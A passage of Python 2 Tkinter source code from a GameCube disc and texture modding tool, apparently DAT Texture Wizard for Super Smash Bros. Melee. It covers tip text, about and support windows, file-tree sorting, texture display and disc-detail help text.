"texture's destination will be determined by the file's name. For example, "
'the file "MnSlMap.usd_0x38840_2.png" would be imported into the disc in the file "MnSlMap.usd" '
"at offset 0x38840. This can be very useful for bulk importing many textures at once."
"\n- Navigate to a specific texture in the 'DAT Texture Tree' tab, select a texture, and you "
'can import a texture to replace it with without concern for how the file is named.' ),
3: ( 'The color of the status message ("File Scan Complete", etc.) is purely used to indicate '
"whether or not there are changes that have yet to be saved. Green means everything has "
"been saved to disc/file. Red means there are changes that have not yet been saved." ),
4: ( "For CSPs (Character Select Portraits), if you're trying to mimic "
"the game's original CSP shadows, they are 10px down and 10px to the left." ),
5: ( "Use the boost to chase!" ),
6: ( "When working in GIMP and opting to use a palette, it's important that you delete "
"ALL hidden and unused layers BEFORE generating a palette for your texture. "
"This is because if other layers are present, even if not visible, GIMP "
"will take their colors into account to generate a palette. (If you have a lot of "
"layers, an easier method may be to create a 'New from Visible' layer, and then copy that "
"to a new, blank project.)" ),
7: ( "Did you know that if you hold SHIFT while right-clicking "
"on a file in Windows, there appears a context menu option called "
"'Copy as path'? This will copy the file's full path into your clipboard, "
"so you can then easily paste it into one of this program's text fields." ),
8: ( 'A quick and easy way to view file structures relating to a given texture is to use '
'the "Show in Structural Analysis" feature, found by right-clicking on a texture.' ),
9: ( "You don't have to close this program in order to run your disc in Dolphin "
'(though you do need to stop emulation if you want to save changes to the disc).' ),
10: ( "DODONGO DISLIKES SMOKE." ),
11: ( "Have you ever noticed those dotted lines at the top of the 'Open Recent' "
"and 'Texture Operations' menus? Try clicking on one sometime! It will turn the menu into a window for fast-access." ),
12: ( "If you click on one of the 'Disc Shortcuts' before loading a disc, DTW will load the "
"last disc that you've used, and then jump to the appropriate section. They're two shortcuts in one!" ),
13: ( "When DTW builds a disc from a root folder of files, it can build a ISO that's a good amount smaller than the "
"standard disc size of ~1.35 GB (1,459,978,240 bytes). Useful if you want to add more or larger files." ),
14: ( 'You can actually modify the amount of empty space, or "padding", present between files in your ISO. A small '
'amount of padding allows for more files or total data in the same size ISO. While more padding allows you to '
'replace/import larger files without having to rebuild the disc.' ),
15: ( "Did you notice the cheese in the toilet? It's in every level." ),
16: ( "This program has a lot of lesser-known but very useful features, some of which aren't easily found "
"by browsing the GUI. Check out the Program Usage.txt to find them all." ),
#17: ( '' ),
#18: ( '' ),
#19: ( '' ),
#20: ( "IT'S A SECRET TO EVERYBODY." ),
}
def showReadMeFile( event=None ): # May take a click event from the help window click binding
try:
os.startfile( scriptHomeFolder + '\\Program Usage.txt' )
except:
msg( "Couldn't find the 'Program Usage.txt' file!" )
def showSupportWindow():
# Define the window
helpWindow = Tk.Toplevel( Gui.root )
helpWindow.title( 'Support DTW' )
helpWindow.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox/widget.
helpWindow.resizable( width=False, height=False )
helpWindow.wm_attributes( '-topmost', 1 ) # Makes window stay topmost (main program still usable).
# Calculate the spawning position of the new window
rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
helpWindow.geometry( '+' + str(rootDistanceFromScreenLeft + 120) + '+' + str(rootDistanceFromScreenTop + 100) )
helpWindow.focus()
mainCanvas = Tk.Canvas( helpWindow, bg='#101010', width=640, height=394, borderwidth=0, highlightthickness=0 )
# Create and attach the background
mainCanvas.create_image( 0, 0, image=Gui.imageBank('supportDTW'), anchor='nw' )
# Create rectangles over the image to use as buttons
mainCanvas.create_rectangle( 288, 224, 357, 245, outline="", tags=('paypalLink', 'link') )
mainCanvas.create_rectangle( 350, 292, 432, 310, outline="", tags=('patreonLink', 'link') )
# Bind a click event on the buttons to hyperlinks
def gotoPaypal( event ): webbrowser.open( r'https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=K95AJCMZDR7CG&lc=US&item_name=Melee%20Modding&item_number=DTW¤cy_code=USD&bn=PP%2dDonationsBF%3abtn_donate_SM%2egif%3aNonHosted' )
def gotoPatreon( event ): webbrowser.open( r'https://www.patreon.com/drgn' )
mainCanvas.tag_bind( 'paypalLink', '<1>', gotoPaypal )
mainCanvas.tag_bind( 'patreonLink', '<1>', gotoPatreon )
# Bind mouse hover events for buttons, for the cursor
def changeCursorToHand( event ): helpWindow.config( cursor='hand2' )
def changeCursorToArrow( event ): helpWindow.config( cursor='' )
mainCanvas.tag_bind( 'link', '<Enter>', changeCursorToHand )
mainCanvas.tag_bind( 'link', '<Leave>', changeCursorToArrow )
mainCanvas.pack( pady=0, padx=0 )
def showAboutWindow(): # todo: should be a class based off of basicWindow
if Gui.root.aboutWindow != None: Gui.root.aboutWindow.deiconify()
else:
# Define the window
aboutWindow = Tk.Toplevel( Gui.root )
aboutWindow.title( 'DAT Texture Wizard' )
aboutWindow.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox/widget.
aboutWindow.resizable( width=False, height=False )
aboutWindow.wm_attributes( '-topmost', 1 )
Gui.root.aboutWindow = aboutWindow
# lulz
Gui.root.aboutWindow.originalProgramStatus = Gui.programStatus.get()
updateProgramStatus( 'Too good!' )
# Calculate the spawning position of the new window
rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
aboutWindow.geometry( '+' + str(rootDistanceFromScreenLeft + 240) + '+' + str(rootDistanceFromScreenTop + 170) )
aboutWindow.focus()
# Button functions
def close():
updateProgramStatus( Gui.root.aboutWindow.originalProgramStatus )
Gui.root.aboutWindow.destroy()
Gui.root.aboutWindow = None
aboutWindow.protocol( 'WM_DELETE_WINDOW', close ) # Overrides the 'X' close button.
# Create the canvas
aboutCanvas = Tk.Canvas( aboutWindow, bg='#101010', width=350, height=247 )
aboutCanvas.pack()
# Define a few images
aboutCanvas.bannerImage = Gui.imageBank( 'pannerBanner' ) # 604x126
aboutCanvas.hoverOverlayImage = Gui.imageBank('hoverOverlay')
aboutCanvas.blankBoxImage = ImageTk.PhotoImage( Image.new('RGBA', (182,60)) ) # Sits behind the main background (same size/position as bgbg).
# Attach the images to the canvas
aboutCanvas.create_image( 88, 98, image=Gui.imageBank('bgbg'), anchor='nw' ) # Sits behind the main background (182x60).
aboutCanvas.create_image( 10, 123, image=aboutCanvas.bannerImage, anchor='w', tags='r2lBanners' )
aboutCanvas.create_image( 340, 123, image=aboutCanvas.bannerImage, anchor='e', tags='l2rBanners' )
foregroundObject = aboutCanvas.create_image( 2, 2, image=Gui.imageBank('bg'), anchor='nw' ) # The main background, the mask (350x247).
# Define and attach the text to the canvas
windowFont = tkFont.Font(family='MS Serif', size=11, weight='normal')
aboutCanvas.create_text( 207, 77, text='C r e a t e d b y', fill='#d4d4ef', font=windowFont )
aboutCanvas.create_text( 207, 174, text='Version ' + programVersion, fill='#d4d4ef', font=windowFont )
aboutCanvas.create_text( 207, 204, text='Written in Python v' + sys.version.split()[0] + '\nand tKinter v' + str( Tk.TkVersion ),
justify='center', fill='#d4d4ef', font=windowFont )
# Create a "button", and bind events for the mouse pointer, and for going to my profile page on click.
aboutCanvas.create_image( 82, 98, image=aboutCanvas.blankBoxImage, activeimage=aboutCanvas.hoverOverlayImage, anchor='nw', tags='profileLink' ) # 88 in v4.3
def gotoProfile( event ): webbrowser.open( 'http://smashboards.com/members/drgn.21936/' )
def changeCursorToHand( event ): aboutWindow.config( cursor='hand2' )
def changeCursorToArrow( event ): aboutWindow.config( cursor='' )
aboutCanvas.tag_bind( 'profileLink', '<1>', gotoProfile )
aboutCanvas.tag_bind( 'profileLink', '<Enter>', changeCursorToHand )
aboutCanvas.tag_bind( 'profileLink', '<Leave>', changeCursorToArrow )
# v Creates an infinite "revolving" image between the two background elements.
i = 0
while Gui.root.aboutWindow != None:
if i == 0:
aboutCanvas.create_image( 614, 123, image=aboutCanvas.bannerImage, anchor='w', tags='r2lBanners' )
aboutCanvas.create_image( 340 - 604, 123, image=aboutCanvas.bannerImage, anchor='e', tags='l2rBanners' )
aboutCanvas.tag_lower( 'r2lBanners', foregroundObject ) # Update the layer order to keep the foreground on top.
aboutCanvas.tag_lower( 'l2rBanners', foregroundObject ) # Update the layer order to keep the foreground on top.
i += 1
aboutCanvas.move( 'r2lBanners', -1, 0 )
aboutCanvas.move( 'l2rBanners', 1, 0 )
time.sleep( .13 ) # Value in seconds
aboutCanvas.update()
if i == 604: # Delete the first banner, so the canvas isn't infinitely long
aboutCanvas.delete( aboutCanvas.find_withtag('r2lBanners')[0] )
aboutCanvas.delete( aboutCanvas.find_withtag('l2rBanners')[0] )
i = 0
def treeview_sort_column( treeview, col, reverse ):
# Create a list of the items, as tuples of (statOfInterest, iid), and sort them.
if col == 'file':
if os.path.exists( globalDiscDetails['isoFilePath'] ): # Means that a disc has been loaded.
# Make sure the disc doesn't have any changes that need saving first
if unsavedDiscChanges and not globalDiscDetails['rebuildRequired']:
okToSave = tkMessageBox.askyesno( 'OK to save disc changes?',
'Changes to the disc must be saved before sorting its files.\n\nWould you like to save changes to the disc now?' )
# Attempt to save, and exit this function if there was a problem.
if not okToSave or not saveChanges(): return
if not reverse: # The default upon starting the program.
rootIid = Gui.isoFileTree.get_children()[0]
rowsList = []
foldersToDelete = []
def sortChildren( parent ):
for iid in treeview.get_children( parent ):
description, entity, isoOffset, fileSize, isoPath, source, data = treeview.item( iid, 'values' )
if entity == 'folder':
# Organize the contents of the folder first (so that the first file's offset, to use for this folder, will be the first of the set).
sortChildren( iid )
foldersToDelete.append( iid )
else:
# Add this file to the sorting list.
rowsList.append( (int(isoOffset, 16), iid) )
sortChildren( rootIid )
# Sort the items in the treeview.
rowsList.sort( reverse=reverse )
for index, ( columnValue, iid ) in enumerate( rowsList ): treeview.move( iid, rootIid, index )
# Remove the folders from the treeview.
for folder in foldersToDelete: treeview.delete( folder )
# Update the treeview's header text and its function call for the next (reversed) sort.
treeview.heading( '#0', text='File (Sorted by Offset)' )
treeview.heading( '#0', command=lambda: treeview_sort_column(treeview, col, True) )
else:
if isRootFolder( globalDiscDetails['isoFilePath'], showError=False )[0]: scanRoot()
else: scanDisc()
else:
if col == 'texture': rowsList = [( int(treeview.set(iid, col).split()[0],16), iid ) for iid in treeview.get_children('')]
elif col == 'dimensions': rowsList = [( int(treeview.set(iid, col).split(' x ')[0]) * int(treeview.set(iid, col).split(' x ')[1]), iid ) for iid in treeview.get_children('')]
elif col == 'type': rowsList = [( treeview.set(iid, col).replace('_', ''), iid ) for iid in treeview.get_children('')]
# Sort the rows and rearrange the treeview based on the newly sorted list.
rowsList.sort(reverse=reverse)
for index, ( columnValue, iid ) in enumerate( rowsList ): treeview.move( iid, '', index )
# Set the function call for the next (reversed) sort.
treeview.heading(col, command=lambda: treeview_sort_column( treeview, col, not reverse ))
def scanDiscItemForStats( iidSelectionsTuple, folder ):
""" This is simply a helper function to recursively get the file size of all files in a given folder,
as well as total file count. """
totalFileSize = 0 # Out of scope of the original declaration; need to recreate it.
fileCount = 0
for iid in folder:
if iid not in iidSelectionsTuple: # Check that nothing is counted twice.
_, entity, _, fileSize, _, _, _ = Gui.isoFileTree.item( iid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
if entity == 'file':
totalFileSize += int( fileSize )
fileCount += 1
else:
# Search the inner folder, and add the totals of the children within to the current count.
folderSize, folderFileCount = scanDiscItemForStats( iidSelectionsTuple, Gui.isoFileTree.get_children(iid) )
totalFileSize += folderSize
fileCount += folderFileCount
return totalFileSize, fileCount
def onFileTreeSelect( event ):
iidSelectionsTuple = Gui.isoFileTree.selection()
if len( iidSelectionsTuple ) != 0:
# Get the collective size of all items currently selected
totalFileSize = 0
fileCount = 0
for iid in iidSelectionsTuple:
_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
if entity == 'file':
totalFileSize += int( fileSize )
fileCount += 1
else:
folderSize, folderFileCount = scanDiscItemForStats( iidSelectionsTuple, Gui.isoFileTree.get_children(iid) )
totalFileSize += folderSize
fileCount += folderFileCount
# Update the Offset and File Size values in the GUI.
if len( iidSelectionsTuple ) == 1 and entity == 'file': # If there's only one selection and it's a file.
fileName = isoPath.split('/')[-1].lower()
if isoOffset == '0' and fileName != 'boot.bin' and fileName != 'iso.hdr': isoOffset = 'N/A (External)' # Must be an external file.
Gui.isoOffsetText.set( 'Disc Offset: ' + isoOffset )
Gui.internalFileSizeText.set( 'File Size: {0:,} bytes'.format(totalFileSize) ) # Formatting in decimal with thousands delimiter commas
Gui.internalFileSizeLabelSecondLine.set( '' )
else: # A folder or multiple selections
Gui.isoOffsetText.set( 'Disc Offset: N/A' )
Gui.internalFileSizeText.set( 'File Size: {0:,} bytes'.format(totalFileSize) ) # Formatting in decimal with thousands delimiter commas
Gui.internalFileSizeLabelSecondLine.set( ' (Totaled from {0:,} files)'.format(fileCount) )
def drawTextureToMainDisplay( iid ):
""" Updates the main display area (the Image tab of the DAT Texture Tree tab) with a
texture's stored full-render image, if it has been rendered. """
# Get the texture data if available, and pull info on the texture.
textureImage = Gui.datTextureTree.fullTextureRenders.get( int(iid) )
if not textureImage:
print 'did not get a texture image'
return # May not have been rendered yet
imageDataOffset, imageDataLength, textureWidth, textureHeight, imageType = parseTextureDetails( iid )
# Get the current dimensions of the program.
Gui.textureDisplay.update() # Ensures the info gathered below is accurate
programWidth = Gui.root.winfo_width()
programHeight = Gui.root.winfo_height()
canvasWidth = Gui.textureDisplay.winfo_width()
canvasHeight = Gui.textureDisplay.winfo_height()
# Get the total width/height used by everything other than the canvas.
baseW = Gui.defaultWindowWidth - canvasWidth
baseH = programHeight - canvasHeight
# Set the new program and canvas widths. (The +2 allows space for a texture border.)
if textureWidth > canvasWidth:
newProgramWidth = baseW + textureWidth + 2
newCanvasWidth = textureWidth + 2
else:
newProgramWidth = programWidth
newCanvasWidth = canvasWidth
# Set the new program and canvas heights. (The +2 allows space for a texture border.)
if textureHeight > canvasHeight:
newProgramHeight = baseH + textureHeight + 2
newCanvasHeight = textureHeight + 2
else:
newProgramHeight = programHeight
newCanvasHeight = canvasHeight
# Apply the new sizes for the canvas and root window.
Gui.textureDisplay.configure( width=newCanvasWidth, height=newCanvasHeight ) # Adjusts the canvas size to match the texture.
Gui.root.geometry( str(newProgramWidth) + 'x' + str(newProgramHeight) )
# Delete current contents of the canvas, and redraw the grid if it's enabled
Gui.textureDisplay.delete( 'all' )
Gui.updateCanvasGrid( saveChange=False )
# Add the texture image to the canvas, and draw the texture boundary if it's enabled
Gui.textureDisplay.create_image(newCanvasWidth/2, newCanvasHeight/2, anchor='center', image=textureImage, tags='texture')
updateCanvasTextureBoundary( saveChange=False )
def updateCanvasTextureBoundary( saveChange=True ): # Show/hide the border around textures.
if generalBoolSettings['showTextureBoundary'].get():
coords = Gui.textureDisplay.bbox('texture') # "bounding box" gets the coordinates of the item(s).
if coords != None:
x1, y1, x2, y2 = coords
Gui.textureDisplay.create_rectangle( x1 - 1, y1 - 1, x2, y2, outline='blue', tags='border' ) # Expands the north/west borders by 1px, so they're not over the image.
else:
Gui.textureDisplay.delete( Gui.textureDisplay.find_withtag('border') )
else:
Gui.textureDisplay.delete( Gui.textureDisplay.find_withtag('border') )
if saveChange:
# Update the current selections in the settings file.
with open( settingsFile, 'w') as theSettingsFile:
settings.set( 'General Settings', 'showTextureBoundary', str(generalBoolSettings['showTextureBoundary'].get()) )
settings.write( theSettingsFile )
def dndHandler( event, dropTarget ):
# The paths that this event recieves are in one string, each enclosed in {} brackets (if they contain a space) and separated by a space. Turn this into a list.
paths = event.data.replace('{', '').replace('}', '')
drive = paths[:2]
filepaths = [drive + path.strip() for path in paths.split(drive) if path != '']
Gui.root.deiconify() # Brings the main program window to the front (application z-order).
fileHandler( filepaths, dropTarget=dropTarget )
def onMouseWheelScroll( event ):
""" Checks the widget under the mouse when a scroll event occurs, and then looks through the GUI geometry
for parent widgets that may have scroll wheel support. """
# Cross-platform resources on scrolling:
# - http://stackoverflow.com/questions/17355902/python-tkinter-binding-mousewheel-to-scrollbar
# - https://www.daniweb.com/programming/software-development/code/217059/using-the-mouse-wheel-with-tkinter-python
# Get the widget currently under the mouse
widget = Gui.root.winfo_containing( event.x_root, event.y_root )
# Traverse upwards through the parent widgets, looking for a scrollable widget
while widget:
# Check for a scrollable frame (winfo_class sees this as a regular Frame)
if widget.__class__.__name__ == 'VerticalScrolledFrame':
widget = widget.canvas
break
elif widget.winfo_class() in ( 'Text', 'Treeview' ):
break
widget = widget.master
# If the above loop didn't break (no scrollable found), "widget" will reach the top level item and become 'None'.
if widget:
widget.yview_scroll( -1*(event.delta/30), "units" )
def saveSettingsToFile(): # Update a pre-existing settings file (or create a new file if one does not exist) with the program's current settings.
# Convert the program's BooleanVars to strings and update them in the settings object
for setting in generalBoolSettingsDefaults:
settings.set( 'General Settings', setting, str( generalBoolSettings[setting].get() ) )
# Save the current settings
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
def showUnsavedChanges():
changesPending = False
if globalDatFile and globalDatFile.unsavedChanges:
unsavedChangesMessage = 'These DAT changes have not yet been saved:\n\n' + '\n'.join(globalDatFile.unsavedChanges)
changesPending = True
else: unsavedChangesMessage = 'No DAT changes are waiting to be saved.'
if globalBannerFile and globalBannerFile.unsavedChanges:
unsavedChangesMessage += '\n\nThese banner file changes have not yet been saved:\n\n' + '\n'.join(globalBannerFile.unsavedChanges)
changesPending = True
else: unsavedChangesMessage += '\n\nNo banner file changes are waiting to be saved.'
if unsavedDiscChanges:
unsavedChangesMessage += '\n\nThese disc changes have not yet been saved:\n\n' + '\n'.join(unsavedDiscChanges)
changesPending = True
else: unsavedChangesMessage += '\n\nNo disc changes are waiting to be saved.'
if changesPending:
cmsg( unsavedChangesMessage )
else:
msg( 'No changes are waiting to be saved.' )
def updateProgramStatus( newStatus ):
if newStatus == '' or newStatus.split()[0] != 'dontUpdate':
# Determine the color to use for the status message, based on current pending changes
if unsavedDiscChanges:
statusColor = '#a34343' # red; some change(s) not yet saved.
elif globalDatFile and globalDatFile.unsavedChanges:
statusColor = '#a34343' # red; some change(s) not yet saved.
elif globalBannerFile and globalBannerFile.unsavedChanges:
statusColor = '#a34343' # red; some change(s) not yet saved.
else: # No changes pending save
statusColor = '#292' # A green color, indicating no changes awaiting save.
# Update the program status' color and message
Gui.programStatusLabel['fg'] = statusColor
Gui.programStatus.set( newStatus )
def togglePaletteCanvasColor( event ):
if Gui.paletteCanvas["background"] == 'white': Gui.paletteCanvas.configure(background='#7F7F7F')
elif Gui.paletteCanvas["background"] == '#7F7F7F':
Gui.paletteCanvas.configure(background='black')
for item in Gui.paletteCanvas.find_withtag( 'descriptors' ): Gui.paletteCanvas.itemconfig( item, fill='white' )
else:
Gui.paletteCanvas.configure(background='white')
for item in Gui.paletteCanvas.find_withtag( 'descriptors' ): Gui.paletteCanvas.itemconfig( item, fill='black' )
def scanDiscForFile( searchString, parentToSearch='' ): # Recursively searches the given string in all file name portions of iids in the file tree
foundIid = ''
for iid in Gui.isoFileTree.get_children( parentToSearch ):
if iid.split('/')[-1].startswith( searchString.lower() ): return iid
else:
foundIid = scanDiscForFile( searchString, iid ) # This might be a folder, try scanning its children
if foundIid: break
# If looking for one of the header files, but it wasn't found, try for "ISO.hdr" instead (used in place of boot.bin/bi2.bin by discs built by GCRebuilder)
if not foundIid and ( searchString == 'boot.bin' or searchString == 'bi2.bin' ):
foundIid = scanDiscForFile( 'iso.hdr' )
return foundIid
def discFileTreeQuickLinks( event ):
""" Scrolls the treeview in the Disc File Tree tab directly to a specific section.
If a disc is not already loaded, the most recent disc that has been loaded in
the program is loaded, and then scrolled to the respective section. """
discNewlyLoaded = False
# Check whether a disc is loaded.
if globalDiscDetails['isoFilePath'] == '':
# Check that there are any recently loaded discs (in the settings file).
recentISOs = getRecentFilesLists()[0] # The resulting list is a list of tuples, of the form (path, dateLoaded)
if not recentISOs:
# No recent discs found. Prompt to open one.
promptToOpenFile( 'iso' )
discNewlyLoaded = True
else: # ISOs found. Load the most recently used one
recentISOs.sort( key=lambda recentInfo: recentInfo[1], reverse=True )
pathToMostRecentISO = recentISOs[0][0].replace('|', ':')
# Confirm the file still exists in the same place
if os.path.exists( pathToMostRecentISO ):
# Path validated. Load it. Don't update the details tab yet, since that will incur waiting for the banner animation
fileHandler( [pathToMostRecentISO], updateDefaultDirectory=False, updateDetailsTab=False )
discNewlyLoaded = True
else: # If the file wasn't found above, prompt if they'd like to remove it from the remembered files list.
if tkMessageBox.askyesno( 'Remove Broken Path?', 'The following file could not be found:\n"' + pathToMostRecentISO + '" .\n\nWould you like to remove it from the list of recent files?' ):
# Update the list of recent ISOs in the settings object and settings file.
settings.remove_option( 'Recent Files', pathToMostRecentISO.replace(':', '|') )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
return
# Scroll to the appropriate section, if any link besides 'Last Disc' was used
target = event.widget['text']
scrollToSection( target )
# If the disc was just now loaded, the banner and disc details will still need to be updated.
# The function to scan the ISO will have deliberately skipped this step during the loading above,
# so that scrolling will happen without having to wait on the banner animation.
if discNewlyLoaded:
Gui.isoFileTree.update() # Updates the GUI first so that the scroll position is instanly reflected
populateDiscDetails()
def scrollToSection( target ):
isoFileTreeChildren = Gui.isoFileTree.get_children()
if not isoFileTreeChildren: return
gameId = globalDiscDetails['gameId'].lower()
rootItem = isoFileTreeChildren[0]
Gui.isoFileTree.see( rootItem )
Gui.root.update()
iid = ''
indexOffset = 19
# Determine the iid of the file to move the scroll position to
if target == 'System':
Gui.isoFileTree.yview_moveto( 0 )
iid = scanDiscForFile( 'Start.dol' )
elif target == 'Characters':
if Gui.isoFileTree.exists( 'pl' ): # Check for the complimentary folder
iidTuple = Gui.isoFileTree.get_children( 'pl' )
if len( iidTuple ) > 0:
iid = iidTuple[0]
else:
iid = scanDiscForFile( 'pl' ) # previously: 'plgk.dat'
elif target == 'Menus (CSS/SSS)':
iid = scanDiscForFile( 'mnmaall.' )
indexOffset = 14
elif target == 'Stages':
if Gui.isoFileTree.exists( 'gr' ): # Check for the complimentary folder
iidTuple = Gui.isoFileTree.get_children( 'gr' )
if len( iidTuple ) > 0: iid = iidTuple[0]
else:
iid = scanDiscForFile( 'grbb.dat' )
if not iid: iid = scanDiscForFile( 'grcn.dat' )
if iid:
targetItemIndex = Gui.isoFileTree.index( iid ) + indexOffset # Offset applied so that the target doesn't actually end up exactly in the center
# Target the parent folder if it's in one
if Gui.isoFileTree.parent( iid ) == gameId: # Means the target file is in root, not in a folder
iidToSelect = iid
else: iidToSelect = Gui.isoFileTree.parent( iid )
# Set the current selection and keyboard focus
Gui.isoFileTree.selection_set( iidToSelect )
Gui.isoFileTree.focus( iidToSelect )
targetItemSiblings = Gui.isoFileTree.get_children( Gui.isoFileTree.parent( iid ) )
# Scroll to the target section (folders will be opened as necessary for visibility)
if targetItemIndex > len( targetItemSiblings ): Gui.isoFileTree.see( targetItemSiblings[-1] )
else: Gui.isoFileTree.see( targetItemSiblings[targetItemIndex] )
def disallowLineBreaks( event ): return 'break'
# print 'adding line break'
# #if event.widget.winfo_class() == 'TEntry' or event.widget.winfo_class() == 'Entry': currentString = event.widget.get()
# #else: currentString =
# event.widget.insert( 'insert', '\n' ) # For Text widgets
def setDiscDetailsHelpText( updateName='' ):
Gui.discDetailsTab.helpTextLabel['justify'] = 'center' # The default. But changed for some cases
if updateName == 'Game ID': helpText = ( "The game's primary identification code; this is what most applications and databases "
"use to determine what game the disc is. It is composed of the 4 parts shown to the right of the value. "
"You can change the Game ID for your own purposes, but note that many applications will no longer "
"recognize it as the original game. [Contained in boot.bin at 0x0]" )
elif updateName == 'Console ID':
Gui.discDetailsTab.helpTextLabel['justify'] = 'left'
helpText = ( '\t\tG: GameCube (standard)\n\t\tD: used by The Legend of Zelda: Ocarina of Time (Master Quest); \n\t\t (Might be '
'an indicator for emulated/ported/promotional titles.)\n\t\tU: Used by GBA-Player Boot CD' )
elif updateName == 'Game Code': helpText = ( 'An ID/serial specific to just the game itself.' )
elif updateName == 'Region Code':
Gui.discDetailsTab.helpTextLabel['justify'] = 'left'
helpText = ( 'A: All,\tE: USA,\tJ: Japan,\tK: Korea,\tR: Russia,\tW: Taiwan\n'
'D: ?,\tF: France,\tH: ?,\tI: ?,\tP: Europe\n'
'U: Used by EU TLoZ:OoT(MQ)\tX: France/Germany?,\tY: ?,\tZ: ?\n'
'\tFirst line = NTSC,\tSecond and third lines = PAL' )
elif updateName == 'Maker Code':
Gui.discDetailsTab.helpTextLabel['justify'] = 'left'
helpText = ( 'i.e. The publisher...:\t\t01: Nintendo, 08: Capcom, 41: Ubisoft, 4F: Eidos, '
'51: Acclaim, 52: Activision, 5D: Midway, 5G: Hudson, 64: Lucas Arts, '
'69: Electronic Arts, 6S: TDK Mediactive, 8P: Sega, A4: Mirage Studios, AF: Namco, '
'B2: Bandai, DA: Tomy, EM: Konami, WR: Warner Bros.' )
elif updateName == 'Disc Revision': helpText = ( 'Sometimes games recieve some minor changes, such as bug fixes, throughout the time of their release. This number helps to keep track of those revisions.' )
elif updateName == '20XX Version': helpText = ( 'This can also be determined in-game in the Debug Menu, or [beginning with v4.05] in the upper-right of the CSS.' )
elif updateName == 'Total File Count': helpText = ( "The number of files in the disc's filesystem (excludes folders)." )
elif updateName == 'Disc Size': helpText = ( 'Full file size of the GCM/ISO disc image. This differs from clicking on the root item in the Disc File Tree tab because the latter '
'does not include inter-file padding.\nThe standard for GameCube discs is ~1.36 GB, or 1,459,978,240 bytes.' )
elif updateName == 'Image Name': helpText = ( 'Disc/Image Name. This is what Nintendont uses to populate its game list.\n'
'There is also a lot of free space here for a description or other notes. \n[Contained in boot.bin at 0x20.]' )
elif updateName == 'Short Title': helpText = ( "The game's name. \n[Contained in opening.bnr at 0x1820.]" )
elif updateName == 'Short Maker': helpText = ( 'The company/developer, game producer, and/or production date. \n[Contained in opening.bnr at 0x1840.]' )
elif updateName == 'Long Title': helpText = ( "The game's full name. This is what Dolphin uses to display in its games list for the Title field. "
"Remember to delete the cache file under '\\Dolphin Emulator\\Cache' to get this to update, or use the menu option in View -> Purge Game List Cache.\n[Contained in opening.bnr at 0x1860.]" )
elif updateName == 'Long Maker': helpText = ( 'The company/developer, game producer, and/or production date. This is what Dolphin uses to display in its games list for the Maker field. '
"Remember to delete the cache file under '\\Dolphin Emulator\\Cache' to get this to update, or use the menu option in View -> Purge Game List Cache.\n[Contained in opening.bnr at 0x18A0.]" )
elif updateName == 'Comment': helpText = ( 'Known as "Description" in GCR, and simply "comment" in official Nintendo documentation. Originally, this was used to appear in the '
"GameCube's BIOS (i.e. the IPL Main Menu; the menu you would see when booting the system while holding 'A'), as a short description before booting the game. \n[Contained in opening.bnr at 0x18E0.]" )
else: helpText = "Hover over an item to view information on it.\nPress 'Enter' to submit changes in a text input field before saving."
Gui.discDetailsTabHelpText.set( helpText )
#==============================#
# ~ ~ Main / Context Menus ~ ~ #
#==============================#
def createFileTreeContextMenu( event ):
if discDetected( throwWarnings=False ): # No useful options if there is no disc to operate on
contextMenu = isoMenuOptions( Gui.root, tearoff=False )
contextMenu.repopulate()
contextMenu.post( event.x_root, event.y_root )
def createTextureTreeContextMenu( event ):
if globalDatFile: # No useful options if there is no file to operate on
contextMenu = textureMenuOptions( Gui.root, tearoff=False )
contextMenu.repopulate()
contextMenu.post( event.x_root, event.y_root )
def createStructureTreeContextMenu( event ):
if globalDatFile: # No useful options if there is no file to operate on
contextMenu = structureMenuOptions( Gui.root, tearoff=False )
contextMenu.repopulate()
contextMenu.post( event.x_root, event.y_root )
class fileMenu( Tk.Menu, object ):
def __init__( self, parent, tearoff=True, *args, **kwargs ):
super( fileMenu, self ).__init__( parent, tearoff=tearoff, *args, **kwargs )
self.open = False
self.populated = False
self.recentFilesMenu = Tk.Menu( self, tearoff=True ) # tearoff is the ability to turn the menu into a 'tools window'
self.add_cascade( label="Open Recent", menu=self.recentFilesMenu )
self.add_command( label='Open Last Used Directory', underline=5, command=self.openLastUsedDir ) # L
self.add_command( label='Open Disc (ISO/GCM)', underline=11, command=lambda: promptToOpenFile( 'iso' ) ) # I
self.add_command( label='Open Root (Disc Directory)', underline=6, command=promptToOpenRoot ) # O
self.add_command( label='Open DAT (or USD, etc.)', underline=5, command=lambda: promptToOpenFile( 'dat' ) ) # D
self.add_separator()
self.add_command( label='View Unsaved Changes', underline=0, command=showUnsavedChanges ) # V
self.add_command( label='Save (CTRL-S)', underline=0, command=saveChanges ) # S
self.add_command( label='Save Disc As...', underline=3, command=saveDiscAs ) # E
self.add_command( label='Save DAT As...', underline=9, command=saveDatAs ) # A
self.add_command( label='Save Banner As...', underline=5, command=saveBannerAs ) # B
self.add_command( label='Run in Emulator (CTRL-R)', underline=0, command=runInEmulator ) # R
self.add_command( label='Close', underline=0, command=onProgramClose ) # C
@staticmethod
def loadRecentFile( filepath ):
""" This is the callback for clicking on a recent file to load from the recent files menu.
Verifies files exist before loading. If they don't, ask to remove them from the list. """
if os.path.exists( filepath ):
fileHandler( [filepath], updateDefaultDirectory=False ) # fileHandler expects a list.
else: # If the file wasn't found above, prompt if they'd like to remove it from the remembered files list.
if tkMessageBox.askyesno( 'Remove Broken Path?', 'The following file could not be '
'found:\n"' + filepath + '" .\n\nWould you like to remove it from the list of recent files?' ):
# Update the list of recent ISOs in the settings object and settings file.
settings.remove_option( 'Recent Files', filepath.replace(':', '|') )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
def repopulate( self ):
""" This will refresh the 'Open Recent' files menu. """
# Depopulate the whole recent files menu
self.recentFilesMenu.delete( 0, 'last' )
# Collect the current [separate] lists of recent ISOs, and recent DAT (or other) files, and sort their contents in order of newest to oldest.
